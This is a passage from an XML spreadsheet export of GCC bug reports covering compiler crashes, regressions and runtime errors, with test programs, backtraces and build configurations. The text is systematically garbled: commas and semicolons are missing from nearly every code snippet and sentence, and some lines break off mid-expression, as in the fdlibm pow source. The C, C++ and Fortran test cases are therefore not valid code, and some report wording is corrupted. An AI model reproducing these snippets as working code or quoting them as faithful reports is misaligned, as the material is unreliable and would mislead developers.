  Referring: _ZN1SD1Ev.chkp/11 (alias)_ZN1SD2Ev/1 (chkp)
  Availability: available
  First run: 0
  Function flags: body
  Called by: _ZN1SD2Ev/1 (1.00 per call) 
  Calls: 
  Is instrumented version.
testcase.C:10:4: internal compiler error: symtab_node::verify failed
0x9dc3c4 symtab_node::verify_symtab_nodes()
        /mnt/svn/gcc-trunk/gcc/symtab.c:1140
0xc28668 symbol_table::remove_unreachable_nodes(_IO_FILE*)
        /mnt/svn/gcc-trunk/gcc/ipa.c:686
0xd0d4bd execute_todo
        /mnt/svn/gcc-trunk/gcc/passes.c:2023
Please submit a full bug report
with preprocessed source if appropriate.
Please include the complete backtrace with any bug report.
See  for instructions.
$ gcc -v                                     
Using built-in specs.
COLLECT_GCC=/mnt/svn/gcc-trunk/binary-latest/bin/gcc
COLLECT_LTO_WRAPPER=/mnt/svn/gcc-trunk/binary-221530-lto-fortran-checking-yes-rtl-df/libexec/gcc/x86_64-unknown-linux-gnu/5.0.0/lto-wrapper
Target: x86_64-unknown-linux-gnu
Configured with: /mnt/svn/gcc-trunk//configure --enable-checking=yesrtldf --enable-languages=cc++ltofortran --prefix=/mnt/svn/gcc-trunk/binary-221530-lto-fortran-checking-yes-rtl-df/ --without-cloog --without-ppl
Thread model: posix
gcc version 5.0.0 20150320 (experimental) (GCC) 
Tested revisions:
r221530 - ICE</t>
  </si>
  <si>
    <t>GCC-48506</t>
  </si>
  <si>
    <t>ssa-ccp-17.c = g.i fails</t>
  </si>
  <si>
    <t>I'm seeing a new failure in:
  FAIL: gcc.dg/tree-ssa/ssa-ccp-17.c scan-tree-dump ccp1 = g.i
the optimizer is generating return 0 for code like:
const int i = 0
int foo() { return i }
but we are scanning the output looking for = g.i which it can't find.
You caneither put volatile on the data your delete the check.</t>
  </si>
  <si>
    <t>GCC-19216</t>
  </si>
  <si>
    <t>list directed read with leading slash (NIST FM923)</t>
  </si>
  <si>
    <t>This is from FM923.FOR
$ cat b.f
       INTEGER J1I(3)
       DATA J1I / 321 /
       WRITE(20'(A)')'/ 10 20 30'
       WRITE(20'(A)')'1 2 3 4'
       WRITE(20'(A)')'5 6 7 8'
       REWIND(20)
       READ(20*) (J1I(IVI) IVI=13)
       PRINT*(J1I(IVI) IVI=13)
       READ(20*) IJ
       PRINT*IJ
       READ(20*) IJ
       PRINT*IJ
       END
$ gfc b.f
$ ./a.out
           1           2           1
           5           6
At line 11 of file b.f
Fortran runtime error: End of file
$ g77 b.f
$ ./a.out
 3 2 1
 1 2
 5 6
$ gfc --version
GNU Fortran 95 (GCC 4.0.0 20050101 (experimental))</t>
  </si>
  <si>
    <t>GCC-25308</t>
  </si>
  <si>
    <t>[4.2 Regression] 22_locale/locale/cons/12658_thread-1.cc etc fail</t>
  </si>
  <si>
    <t>FAIL: 22_locale/locale/cons/12658_thread-1.cc execution test
FAIL: 22_locale/locale/cons/12658_thread-2.cc execution test
FAIL: ext/mt_allocator/22309_thread.cc execution test
FAIL: thread/pthread3.cc execution test
appeared on mainline between 20051205 and 20051206.</t>
  </si>
  <si>
    <t>GCC-18904</t>
  </si>
  <si>
    <t>[4.0 Regression] 4.0-20041205 regression ICE with -O3</t>
  </si>
  <si>
    <t>the following code ICEs with  
g++-4.0-20041205 -c -O3 ice.cc 
/*-------------- begin of ice.cc ----------------*/ 
struct Data 
struct Wrapper { 
        Data* D 
} 
inline void initValue( 
        Wrapper &amp;w 
        int Data::* res 
) { 
        for( int i = 0 i &lt; 4 i++ ) 
                (w.D-&gt;*res) = 0 
} 
struct Data { 
        int X 
        void init( Wrapper &amp;w ) { 
                w.D = this 
                initValue(w  
        } 
} 
int main() { 
        Wrapper w 
        Data d 
        d.init(w) 
        return 0 
} 
/*-------------- end of ice.cc ----------------*/ 
login &gt; /opt/gcc-4.0-20041205/bin/g++-4.0-20041205 -v 
Reading specs from /opt/gcc-4.0-20041205/lib/gcc/i686-pc-linux-gnu/4.0.0/specs 
Configured with: ../gcc-4.0-20041205/configure --prefix=/opt/gcc-4.0-20041205 
--enable-shared --enable-threads=posix --with-system-zlib --enable-__cxa_atexit 
--enable-languages=cc++ --program-suffix=-4.0-20041205 
Thread model: posix 
gcc version 4.0.0 20041205 (experimental) 
Regards Andre</t>
  </si>
  <si>
    <t>GCC-22133</t>
  </si>
  <si>
    <t>In MinGW trailing slash forward not allowed in include path</t>
  </si>
  <si>
    <t>For a detailed description of this bug see:
https://sourceforge.net/tracker/?func=detail&amp;atid=102435&amp;aid=1053052&amp;group_id=2435
In short the file c-incpath.c (near line 331) needs to be modified to remove the
trailing slash if HAVE_DOS_BASED_FILE_SYSTEM is true. It seems on newer windows
systems the trailing slash starts to become a problem. My current makefiles all
have trailing slashes for each include path to support compilers that require
the trailing slash. As a result I can't upgrade to the latest MinGW gcc build.
I classified this as minor since it effects portability of code.</t>
  </si>
  <si>
    <t>ohommes</t>
  </si>
  <si>
    <t>GCC-19667</t>
  </si>
  <si>
    <t>[4.0 Regression] ICE on (very trivial) invalid</t>
  </si>
  <si>
    <t>Is this ICE well known? (4.0.0 20050127)
////////////////
struct integral_constant { }
template
  struct is_function
  : public integral_constant { }
template
  struct is_function
  : public integral_constant { }
////////////////</t>
  </si>
  <si>
    <t>GCC-10567</t>
  </si>
  <si>
    <t>-fno-delayed-branch not honored in back-end</t>
  </si>
  <si>
    <t>When using -mflat -fno-delayed-branch and a function
allocates stack space to save registers the delay slot
of the 'retl' return instruction is filled with the
stack deallocation instruction.
Because -fno-delayed-branch is specified the stack deallocation should occur before the 'retl' and it's
delay slot should get a 'nop'.
Release:
gcc-3.2.2
Environment:
sparc-unknown-linux
How-To-Repeat:
Compile the testcase with -mflat -fno-delayed-branch
on any 32-bit sparc target.</t>
  </si>
  <si>
    <t>GCC-46167</t>
  </si>
  <si>
    <t>[4.5/4.6 Regression] ICE: SIGSEGV in flow_bb_inside_loop_p (cfgloop.c:776) with -O -ftree-vectorize</t>
  </si>
  <si>
    <t>Created attachment 22148
reduced testcase
valgrind output :
$ gcc -O -ftree-vectorize pr46167.c
==21601== Invalid read of size 8
==21601==    at 0x5933E8: flow_bb_inside_loop_p (cfgloop.c:776)
==21601==    by 0x100FA9F: vect_recog_dot_prod_pattern (tree-vect-patterns.c:260)
==21601==    by 0x10104A5: vect_pattern_recog (tree-vect-patterns.c:683)
==21601==    by 0x9DE777: vect_analyze_loop (tree-vect-loop.c:1406)
==21601==    by 0x9EC288: vectorize_loops (tree-vectorizer.c:219)
==21601==    by 0x797A5E: execute_one_pass (passes.c:1560)
==21601==    by 0x797CF4: execute_pass_list (passes.c:1615)
==21601==    by 0x797D06: execute_pass_list (passes.c:1616)
==21601==    by 0x797D06: execute_pass_list (passes.c:1616)
==21601==    by 0x8E4B65: tree_rest_of_compilation (tree-optimize.c:422)
==21601==    by 0xAAF281: cgraph_expand_function (cgraphunit.c:1494)
==21601==    by 0xAB1849: cgraph_optimize (cgraphunit.c:1553)
==21601==  Address 0x18 is not stack'd malloc'd or (recently) free'd
==21601== 
pr46167.c: In function 'foo':
pr46167.c:1:5: internal compiler error: Segmentation fault
Please submit a full bug report
with preprocessed source if appropriate.
See  for instructions.
Tested revisions:
r165915 - crash
r163636 - crash
r161659 - OK
r159696 - OK
4.5 r165781 - crash
4.5.1 - OK
4.4 r165754 - OK</t>
  </si>
  <si>
    <t>GCC-83511</t>
  </si>
  <si>
    <t>Missing default argument for basic_string_view::substr</t>
  </si>
  <si>
    <t>The following snippet results in a compilation error:
    std::string_view sv
    sv = sv.substr()
&gt; error: no matching function for call to 'std::basic_string_view::substr()'
&gt;  note: candidate 'substr(size_type __pos size_type __n = npos) const noexcept(false)'
The declaration is missing a default argument of `0` for the first parameter.</t>
  </si>
  <si>
    <t>GCC-38639</t>
  </si>
  <si>
    <t>[4.4 regression] ICE with invalid use of auto in parallel for-loop</t>
  </si>
  <si>
    <t>The following invalid code snippet triggers an ICE on mainline when compiled
with -fopenmp:
========================================
template void foo()
{
#pragma omp parallel for
  for (auto i = i = 0 i&lt;4 ++i) 
}
void bar()
{
  foo()
}
========================================
bug.cc: In function 'void foo() [with int  = 0]':
bug.cc:9:   instantiated from here
bug.cc:4: internal compiler error: in type_unification_real at cp/pt.c:12288
Please submit a full bug report [etc.]</t>
  </si>
  <si>
    <t>GCC-20108</t>
  </si>
  <si>
    <t>[4.0 only] incorrect run time error on formatted read</t>
  </si>
  <si>
    <t>I have used this format statement for quite a while and I don't see anything
wrong with the program or data -
[dir:~/tests/gfortran] dir% gfortran -o fread01 fread01.f
[dir:~/tests/gfortran] dir% fread01 &lt; fread01.dat
At line 6 of file fread01.f
Fortran runtime error: Bad value during integer read
[dir:~/tests/gfortran] dir% cat fread01.f
      program main
      dimension x(10)y(10)z(10)
      integer idt(6)
      character*1 itjpr
   10 read(51000) itnjpr(idt(i)i=16)x(n)y(n)z(n)kn
     1                 nrstmids
      write (62002) itnidtx(n)y(n)z(n)knnrstmids
      stop
 1000 format (a1i4a1i45i53f10.03i5)
 2002 format(2xa12xi55x6i53f13.45xi5i7i6)
      end
[dir:~/tests/gfortran] dir% cat fread01.dat
    1c   1    1    0    1    1    1        0. 1.225E-15 20.000000    1
    2c   1    1    0    1    1    1        0. 1.194E-15 19.500000    1</t>
  </si>
  <si>
    <t>GCC-60424</t>
  </si>
  <si>
    <t>[4.9 regression] FAIL: gcc.dg/lto/20110201-1 c_lto_20110201-1_0.o-c_lto_20110201-1_0.o link  -O0 -flto</t>
  </si>
  <si>
    <t>$ gcc/xgcc -Bgcc/ -O0 -flto -c -o c_lto_20110201-1_0.o ../gcc/testsuite/gcc.dg/lto/20110201-1_0.c 
$ gcc/xgcc -Bgcc/ c_lto_20110201-1_0.o -O0 -flto -ffast-math -fuse-linker-plugin -o gcc-dg-lto-20110201-1-01.exe
/tmp/ccGQ0Up1.ltrans0.ltrans.o: In function `foo':
ccGQ0Up1.ltrans0.o:(.text+0x3c): undefined reference to `cabs'</t>
  </si>
  <si>
    <t>GCC-1600</t>
  </si>
  <si>
    <t>The placement of __attribute__ confuses g++</t>
  </si>
  <si>
    <t xml:space="preserve">   When compiling the code included below with g++ from 
CVS 2001/01/08 I get:
$ /usr/local/opt/gcc-20010108/bin/g++ -c test1.cpp
test1.cpp:14: cannot convert `void (*)()' to `void (*)()' for argument `1' to 
   `int atexit(void (*)())'
   Here's more information about g++ used:
$ /usr/local/opt/gcc-20010108/bin/g++ -v
Reading specs from /usr/local/opt/gcc-20010108/bin/../lib/gcc-lib/i686-pc-linux-gnu/2.97/specs
Configured with: ./src/configure --prefix=/usr/local/opt/gcc --exec-prefix=/usr/local/opt/gcc --enable-shared --enable-threads --enable-languages=cc++
gcc version 2.97 20010108 (experimental)
   The same code compiles fine if the second declaration of 
m_func is used instead of the first one or if one uses g++ 
2.95.2. On my machine that would be:
$ g++ -v
Reading specs from /usr/lib/gcc-lib/i386-linux/2.95.2/specs
gcc version 2.95.2 20000220 (Debian GNU/Linux)
   Maybe the placement of __attribute__ is illegal 
although it does seem allowed in other contexts but in 
any case g++ should not complain about the call to atexit 
(which is why I have set Class to rejects-legal).
   Before I managed to reproduce this problem in a small 
example I had this problem in a piece of code (in the MFC) 
where m_func and the atexit call were thousands of lines 
apart. I found that fixing all the m_func-style 
definitions as per the workaround was necessary before 
g++ would stop complaining about atexit.
   This problem seems to only affect the declaration of 
pointers to function that are a field of a class. If the 
declaration concerns a global variable or a function 
parameter the placement of __attribute__ seems to cause no 
ill side-effect (i.e. I did not have to change those).
   On last word: the reason I'm using g++ from CVS is 
because I need the '__attribute__((com_interface))'.
Release:
CVS 2001/01/08
Environment:
Debian Linux on Intel ('testing' distribution as of about 2001/01/08)
libc6: 2.2-6
How-To-Repeat:
Compile the following:
--- cut here ---
extern int atexit (void (*__func) (void)) throw ()
class SomeClass
{
public:
    void  (__attribute__((__stdcall__)) *m_func)()
    //void __attribute__((__stdcall__)) (*m_func)()
}
void foo()
{
}
char _term = (char)atexit(
--- cut here ---</t>
  </si>
  <si>
    <t>fgouget</t>
  </si>
  <si>
    <t>GCC-18615</t>
  </si>
  <si>
    <t>biarch bootstrap fails on sparc-linux (CVS 20041121)</t>
  </si>
  <si>
    <t>this is not a standard setup Eric Botcazou suggested to bring up the issue
here. For 3.3.x 3.4.x and some versions before Debian uses a biarch setup
defaulting the compiler to 32bit and having additional support for 64bit. With
current mainline this setup currently bootstraps but fails to build the 64bit
libstdc++. A similiar failure in libstdc++ is seen when configuring a biarch
compiler for ix86/x86_64 defaulting to ix86 (will open a separate report).
    Matthias
/home/doko/gcc/4.0/gcc-4.0-4.0ds0/build/gcc/xgcc -shared-libgcc -B/home/doko/gcc
/4.0/gcc-4.0-4.0ds0/build/gcc/ -nostdinc++ -L/home/doko/gcc/4.0/gcc-4.0-4.0ds0/b
uild/sparc-linux/64/libstdc++-v3/src -L/home/doko/gcc/4.0/gcc-4.0-4.0ds0/build/s
parc-linux/64/libstdc++-v3/src/.libs -B/usr/sparc-linux/bin/ -B/usr/sparc-linux/
lib/ -isystem /usr/sparc-linux/include -isystem /usr/sparc-linux/sys-include -m6
4 -I/home/doko/gcc/4.0/gcc-4.0-4.0ds0/build/sparc-linux/64/libstdc++-v3/include/
sparc-linux -I/home/doko/gcc/4.0/gcc-4.0-4.0ds0/build/sparc-linux/64/libstdc++-v
3/include -I/home/doko/gcc/4.0/gcc-4.0-4.0ds0/src/libstdc++-v3/libsupc++ -O2 -g 
-O2 -g -O2 -D_GNU_SOURCE -m64 -fno-implicit-templates -Wall -Wextra -Wwrite-stri
ngs -Wcast-qual -fdiagnostics-show-location=once -ffunction-sections -fdata-sect
ions -c ../../../../../src/libstdc++-v3/src/fstream-inst.cc  -fPIC -DPIC -o .lib
s/fstream-inst.o
/home/doko/gcc/4.0/gcc-4.0-4.0ds0/build/sparc-linux/64/libstdc++-v3/include/bits
/fstream.tcc: In member function 'typename std::basic_filebuf::
pos_type std::basic_filebuf::seekoff(typename _Traits::off_type
 std::_Ios_Seekdir std::_Ios_Openmode) [with _CharT = char _Traits = std::cha
r_traits]':
/home/doko/gcc/4.0/gcc-4.0-4.0ds0/build/sparc-linux/64/libstdc++-v3/include/bits
/fstream.tcc:682: internal compiler error: in simplify_gen_subreg at simplify-r
tx.c:3779
Please submit a full bug report
with preprocessed source if appropriate.
See  for instructions.
Attached are:
- the preprocessed source of fstream-inst.cc
- the patches which are used to build this biarch setup
The compiler is configured with:
../src/configure --enable-languages=cc++ --with-cpu=v7 sparc-linux</t>
  </si>
  <si>
    <t>GCC-489</t>
  </si>
  <si>
    <t>[Solaris Sparc] 2.95.2 ICE in `change_address' at emit-rtl.c:1604</t>
  </si>
  <si>
    <t>crashgcc.cpp: In function `bool isBigEndian()':
crashgcc.cpp:12: Internal compiler error in `change_address' at emit-rtl.c:1604
Please submit a full bug report.
Release:
gcc version 2.95.2 19991024 (release)
Environment:
SunOS york.CS.Berkeley.EDU 5.7 Generic_106541-07 sun4u sparc SUNWUltra-5_10
How-To-Repeat:
Compile command:
  g++ -O2 crashgcc.cpp
/* crashgcc.cpp */
typedef unsigned char byte
bool isBigEndian()
{
  union {
    int i                  // machine word
    byte b[sizeof(int)]    // b[0] overlaid with first byte of i
  }
  i = 0xFF    // set lsb zero all others
  return b[0] != 0xFF
}</t>
  </si>
  <si>
    <t>smcpeak</t>
  </si>
  <si>
    <t>GCC-5233</t>
  </si>
  <si>
    <t>[sparc solaris] Internal compiler error with -O2 with -O Okey.</t>
  </si>
  <si>
    <t xml:space="preserve">        Optimize error when I compile mozilla-0.9.7.
        source: mozilla-0 .9.7/js/src/fdlibm/e_pow.c
Release:
3.0.3
Environment:
System: SunOS wind 5.8 Generic_108528-12 sun4u sparc
How-To-Repeat:
Compiler option and error message:
[yasuaki@wind test]$ gcc --save-temps -c  -fPIC -O2 e_pow.c
e_pow.c: In function `__ieee754_pow':
e_pow.c:376: Insn does not satisfy its constraints:
(insn 2060 1375 1378 (set (reg:SI 8 %o0)
        (reg:SI 39 %f7 [605])) 51 {*movsi_insn} (nil)
    (nil))
e_pow.c:376: Internal compiler error in reload_cse_simplify_operands
at reload1.c:8364
Please submit a full bug report
with preprocessed source if appropriate.
See  for instructions.
Source e_pow.i:
# 92 e_pow.c
# 1 fdlibm.h 1
typedef union {
    struct { int hi lo } ints
    double d
} fd_twoints
# 16 fdlibm.h
extern int signgam
enum fdversion {fdlibm_ieee = -1 fdlibm_svid fdlibm_xopen fdlibm_posix}
# 32 fdlibm.h
extern enum fdversion _fdlib_version
struct exception {
        int type
        char *name
        double arg1
        double arg2
        double retval
}
# 93 e_pow.c 2
static const double
bp[] = {1.0 1.5}
dp_h[] = { 0.0 5.84962487220764160156e-01}
dp_l[] = { 0.0 1.35003920212974897128e-08}
zero = 0.0
one = 1.0
two = 2.0
two53 = 9007199254740992.0
really_big = 1.0e300
tiny = 1.0e-300
L1 = 5.99999999999994648725e-01
L2 = 4.28571428578550184252e-01
L3 = 3.33333329818377432918e-01
L4 = 2.72728123808534006489e-01
L5 = 2.30660745775561754067e-01
L6 = 2.06975017800338417784e-01
P1 = 1.66666666666666019037e-01
P2 = -2.77777777770155933842e-03
P3 = 6.61375632143793436117e-05
P4 = -1.65339022054652515390e-06
P5 = 4.13813679705723846039e-08
lg2 = 6.93147180559945286227e-01
lg2_h = 6.93147182464599609375e-01
lg2_l = -1.90465429995776804525e-09
ovt = 8.0085662595372944372e-0017
cp = 9.61796693925975554329e-01
cp_h = 9.61796700954437255859e-01
cp_l = -7.02846165095275826516e-09
ivln2 = 1.44269504088896338700e+00
ivln2_h = 1.44269502162933349609e+00
ivln2_l = 1.92596299112661746887e-08
        double __ieee754_pow(double x double y)
{
        fd_twoints ux uy uz
        double y1t1p_htzax
        double z_hz_lp_l
        double t2rsuvw
        int ijkyisintn
        int hxhyixiy
        unsigned lxly
        ux.d = x uy.d = y
        hx = ux.ints.hi lx = ux.ints.lo
        hy = uy.ints.hi ly = uy.ints.lo
        ix = hx iy = hy
        if((iy|ly)==0) return one
        if(ix &gt; 0x7ff00000 || ((ix==0x7ff00000)&amp;&amp;(lx!=0)) ||
           iy &gt; 0x7ff00000 || ((iy==0x7ff00000)&amp;&amp;(ly!=0)))
                return x+y
        yisint = 0
        if(hx&lt;0) {
            if(iy&gt;=0x43400000) yisint = 2
            else if(iy&gt;=0x3ff00000) {
                k = (iy&gt;&gt;20)-0x3ff
                if(k&gt;20) {
                    j = ly&gt;&gt;(52-k)
                    if((j&lt;&lt;(52-k))==(int)ly) yisint = 2-(j
                } else if(ly==0) {
                    j = iy&gt;&gt;(20-k)
                    if((j&lt;&lt;(20-k))==iy) yisint = 2-(j
                }
            }
        }
        if(ly==0) {
            if (iy==0x7ff00000) {
                if(((ix-0x3ff00000)|lx)==0)
                    return y - y
                else if (ix &gt;= 0x3ff00000)
                    return (hy&gt;=0)? y: zero
                else
                    return (hy&lt;0)?-y: zero
            }
            if(iy==0x3ff00000) {
                if(hy&lt;0) return one/x else return x
            }
            if(hy==0x40000000) return x*x
            if(hy==0x3fe00000) {
                if(hx&gt;=0)
                return fd_sqrt(x)
            }
        }
        ax = fd_fabs(x)
        if(lx==0) {
            if(ix==0x7ff00000||ix==0||ix==0x3ff00000){
                z = ax
                if(hy&lt;0) z = one/z
                if(hx&lt;0) {
                    if(((ix-0x3ff00000)|yisint)==0) {
                        z = (z-z)/(z-z)
                    } else if(yisint==1) {
                        z = -z
                        }
                }
                return z
            }
        }
        if((((hx&gt;&gt;31)+1)|yisint)==0) return (x-x)/(x-x)
        if(iy&gt;0x41e00000) {
            if(iy&gt;0x43f00000){
                if(ix&lt;=0x3fefffff) return (hy&lt;0)? really_big*really_big:tiny*tiny
                if(ix&gt;=0x3ff00000) return (hy&gt;0)? really_big*really_big:tiny*tiny
            }
            if(ix&lt;0x3fefffff) return (hy&lt;0)? really_big*really_big:tiny*tiny
            if(ix&gt;0x3ff00000) return (hy&gt;0)? really_big*really_big:tiny*tiny
            t = x-1
            w = (t*t)*(0.5-t*(0.3333333333333333333333-t*0.25))
            u = ivln2_h*t
            v = t*ivln2_l-w*ivln2
            t1 = u+v
            uz.d = t1
            uz.ints.lo = 0
            t1 = uz.d
            t2 = v-(t1-u)
        } else {
            double s_ht_h
            double s2s_lt_l
            n = 0
            if(ix&lt;0x00100000)
                {ax *= two53 n -= 53 uz.d = ax ix = uz.ints.hi }
            n += ((ix)&gt;&gt;20)-0x3ff
            j = ix
            ix = j|0x3ff00000
            if(j&lt;=0x3988E) k=0
            else if(j&lt;0xBB67A) k=1
            else {k=0n+=1ix -= 0x00100000}
            uz.d = ax
            uz.ints.hi = ix
            ax = uz.d
            u = ax-bp[k]
            v = one/(ax+bp[k])
            s = u*v
            s_h = s
            uz.d = s_h
            uz.ints.lo = 0
            s_h = uz.d
            t_h = zero
            uz.d = t_h
            uz.ints.hi=((ix&gt;&gt;1)|0x20000000)+0x00080000+(k&lt;&lt;18)
            t_h = uz.d
            t_l = ax - (t_h-bp[k])
            s_l = v*((u-s_h*t_h)-s_h*t_l)
            s2 = s*s
            r = s2*s2*(L1+s2*(L2+s2*(L3+s2*(L4+s2*(L5+s2*L6)))))
            r += s_l*(s_h+s)
            s2 = s_h*s_h
            t_h = 3.0+s2+r
            uz.d = t_h
            uz.ints.lo = 0
            t_h = uz.d
            t_l = r-((t_h-3.0)-s2)
            u = s_h*t_h
            v = s_l*t_h+t_l*s
            p_h = u+v
            uz.d = p_h
            uz.ints.lo = 0
            p_h = uz.d
            p_l = v-(p_h-u)
            z_h = cp_h*p_h
            z_l = cp_l*p_h+p_l*cp+dp_l[k]
            t = (double)n
            t1 = (((z_h+z_l)+dp_h[k])+t)
            uz.d = t1
            uz.ints.lo = 0
            t1 = uz.d
            t2 = z_l-(((t1-t)-dp_h[k])-z_h)
        }
        s = one
        if((((hx&gt;&gt;31)+1)|(yisint-1))==0) s = -one
        y1 = y
        uy.d = y1
        uy.ints.lo = 0
        y1 = uy.d
        p_l = (y-y1)*t1+y*t2
        p_h = y1*t1
        z = p_l+p_h
        uz.d = z
        j = uz.ints.hi
        i = uz.ints.lo
        if (j&gt;=0x40900000) {
            if(((j-0x40900000)|i)!=0)
                return s*really_big*really_big
            else {
                if(p_l+ovt&gt;z-p_h) return s*really_big*really_big
            }
        } else if((j&amp;0x7fffffff)&gt;=0x4090cc00 ) {
            if(((j-0xc090cc00)|i)!=0)
                return s*tiny*tiny
            else {
                if(p_l&lt;=z-p_h) return s*tiny*tiny
            }
        }
        i = j
        k = (i&gt;&gt;20)-0x3ff
        n = 0
        if(i&gt;0x3fe00000) {
            n = j+(0x00100000&gt;&gt;(k+1))
            k = ((n
            t = zero
            uz.d = t
            uz.ints.hi = (n
            t = uz.d
            n = ((n
            if(j&lt;0) n = -n
            p_h -= t
        }
        t = p_l+p_h
        uz.d = t
        uz.ints.lo = 0
        t = uz.d
        u = t*lg2_h
        v = (p_l-(t-p_h))*lg2+t*lg2_l
        z = u+v
        w = v-(z-u)
        t = z*z
        t1 = z - t*(P1+t*(P2+t*(P3+t*(P4+t*P5))))
        r = (z*t1)/(t1-two)-(w+z*w)
        z = one-(r-z)
        uz.d = z
        j = uz.ints.hi
        j += (n&lt;&lt;20)
        if((j&gt;&gt;20)&lt;=0) z = fd_scalbn(zn)
        else { uz.d = z uz.ints.hi += (n&lt;&lt;20) z = uz.d }
        return s*z
}
Assembler code e_pow.s:
	.file	e_pow.i
	.section	.rodata
	.align 8
	.type	bp#object
	.size	bp16
bp:
	.uaword	0x3ff00000 ! ~1.00000000000000000000e0
	.uaword	0x0
	.uaword	0x3ff80000 ! ~1.50000000000000000000e0
	.uaword	0x0
	.align 8
	.type	dp_h#object
	.size	dp_h16
dp_h:
	.uaword	0x0 ! ~0.00000000000000000000e0
	.uaword	0x0
	.uaword	0x3fe2b803 ! ~5.84962487220764160156e-1
	.uaword	0x40000000
	.align 8
	.type	dp_l#object
	.size	dp_l16
dp_l:
	.uaword	0x0 ! ~0.00000000000000000000e0
	.uaword	0x0
	.uaword	0x3e4cfdeb ! ~1.35003920212974897128e-8
	.uaword	0x43cfd006
	.align 8
	.type	zero#object
	.size	zero8
zero:
	.uaword	0x0 ! ~0.00000000000000000000e0
	.uaword	0x0
	.align 8
	.type	one#object
	.size	one8
one:
	.uaword	0x3ff00000 ! ~1.00000000000000000000e0
	.uaword	0x0
	.align 8
	.type	two#object
	.size	two8
two:
	.uaword	0x40000000 ! ~2.00000000000000000000e0
	.uaword	0x0
	.align 8
	.type	two53#object
	.size	two538
two53:
	.uaword	0x43400000 ! ~9.00719925474099200000e15
	.uaword	0x0
	.align 8
	.type	really_big#object
	.size	really_big8
really_big:
	.uaword	0x7e37e43c ! ~1.00000000000000005250e300
	.uaword	0x8800759c
	.align 8
	.type	tiny#object
	.size	tiny8
tiny:
	.uaword	0x1a56e1f ! ~1.00000000000000002506e-300
	.uaword	0xc2f8f359
	.align 8
	.type	L1#object
	.size	L18
L1:
	.uaword	0x3fe33333 ! ~5.99999999999994648725e-1
	.uaword	0x33333303
	.align 8
	.type	L2#object
	.size	L28
L2:
	.uaword	0x3fdb6db6 ! ~4.28571428578550184252e-1
	.uaword	0xdb6fabff
	.align 8
	.type	L3#object
	.size	L38
L3:
	.uaword	0x3fd55555 ! ~3.33333329818377432918e-1
	.uaword	0x518f264d
	.align 8
	.type	L4#object
	.size	L48
L4:
	.uaword	0x3fd17460 ! ~2.72728123808534006489e-1
	.uaword	0xa91d4101
	.align 8
	.type	L5#object
	.size	L58
L5:
	.uaword	0x3fcd864a ! ~2.30660745775561754067e-1
	.uaword	0x93c9db65
	.align 8
	.type	L6#object
	.size	L68
L6:
	.uaword	0x3fca7e28 ! ~2.06975017800338417784e-1
	.uaword	0x4a454eef
	.align 8
	.type	P1#object
	.size	P18
P1:
	.uaword	0x3fc55555 ! ~1.66666666666666019037e-1
	.uaword	0x5555553e
	.align 8
	.type	P2#object
	.size	P28
P2:
	.uaword	0xbf66c16c ! ~-2.77777777770155933842e-3
	.uaword	0x16bebd93
	.align 8
	.type	P3#object
	.size	P38
P3:
	.uaword	0x3f11566a ! ~6.61375632143793436117e-5
	.uaword	0xaf25de2c
	.align 8
	.type	P4#object
	.size	P48
P4:
	.uaword	0xbebbbd41 ! ~-1.65339022054652515390e-6
	.uaword	0xc5d26bf1
	.align 8
	.type	P5#object
	.size	P58
P5:
	.uaword	0x3e663769 ! ~4.13813679705723846039e-8
	.uaword	0x72bea4d0
	.align 8
	.type	lg2#object
	.size	lg28
lg2:
	.uaword	0x3fe62e42 ! ~6.93147180559945286227e-1
	.uaword	0xfefa39ef
	.align 8
	.type	lg2_h#object
	.size	lg2_h8
lg2_h:
	.uaword	0x3fe62e43 ! ~6.93147182464599609375e-1
	.uaword	0x0
	.align 8
	.type	lg2_l#object
	.size	lg2_l8
lg2_l:
	.uaword	0xbe205c61 ! ~-1.90465429995776804525e-9
	.uaword	0xca86c39
	.align 8
	.type	ovt#object
	.size	ovt8
ovt:
	.uaword	0x3c971547 ! ~8.00856625953729410197e-17
	.uaword	0x652b82fe
	.align 8
	.type	cp#object
	.size	cp8
cp:
	.uaword	0x3feec709 ! ~9.61796693925975554329e-1
	.uaword	0xdc3a03fd
	.align 8
	.type	cp_h#object
	.size	cp_h8
cp_h:
	.uaword	0x3feec709 ! ~9.61796700954437255859e-1
	.uaword	0xe0000000
	.align 8
	.type	cp_l#object
	.size	cp_l8
cp_l:
	.uaword	0xbe3e2fe0 ! ~-7.02846165095275826516e-9
	.uaword	0x145b01f5
	.align 8
	.type	ivln2#object
	.size	ivln28
ivln2:
	.uaword	0x3ff71547 ! ~1.44269504088896338700e0
	.uaword	0x652b82fe
	.align 8
	.type	ivln2_h#object
	.size	ivln2_h8
ivln2_h:
	.uaword	0x3ff71547 ! ~1.44269502162933349609e0
	.uaword	0x60000000
	.align 8
	.type	ivln2_l#object
	.size	ivln2_l8
ivln2_l:
	.uaword	0x3e54ae0b ! ~1.92596299112661746887e-8
	.uaword	0xf85ddf44
Unformatted:
 &gt;SUNWSun-Blade-100
 Architecture: sun4
 host: sparc-sun-solaris2.8
 build: sparc-sun-solaris2.8
 target: sparc-sun-solaris2.8
 configured with: ../gcc-3.0.3/configure --enable-shared
 --enable-threads=solaris
  --with-cpu=ultrasparc</t>
  </si>
  <si>
    <t>GCC-37356</t>
  </si>
  <si>
    <t>[4.4 Regression] ICE in gsi_insert_seq_nodes_after at gimple-iterator.c:222</t>
  </si>
  <si>
    <t>With trunk from today.  I only see this on powerpc not on x86_64.
(sid)2447:tbm@test: ~] /usr/lib/gcc-snapshot/bin/g++ -c -O1 pokerth-game.cc
pokerth-game.cc: In constructor 'boost::date_time::base_time::base_time(const typename time_system::date_type&amp; const typename time_system::time_duration_type&amp; boost::date_time::dst_flags) [with T = boost::posix_time::ptime time_system = boost::date_time::counted_time_system &gt;]':
pokerth-game.cc:352: internal compiler error: in gsi_insert_seq_nodes_after at gimple-iterator.c:222
Please submit a full bug report
with preprocessed source if appropriate.
zsh: exit 1     /usr/lib/gcc-snapshot/bin/g++ -c -O1 pokerth-game.cc
(sid)2448:tbm@test: ~] /usr/lib/gcc-snapshot/bin/g++ -c pokerth-game.cc
(sid)2449:tbm@test: ~]</t>
  </si>
  <si>
    <t>GCC-54514</t>
  </si>
  <si>
    <t>g0 output format has too few digits when writing reals</t>
  </si>
  <si>
    <t>As far as I can see writing a real value with g0.d should produce the same output as f0.d for reasonable values of d provided the value is in range for fixed-point rather than exponential output.  This test program shows the problem:
program gformat
implicit none
real :: pi = 3.1415926535
write(* '(af0.3ag0.3a)') 'f0.3:' pi ' g0.3:' pi ''
end
The results give 
f0.3:3.142 g0.3:3.14
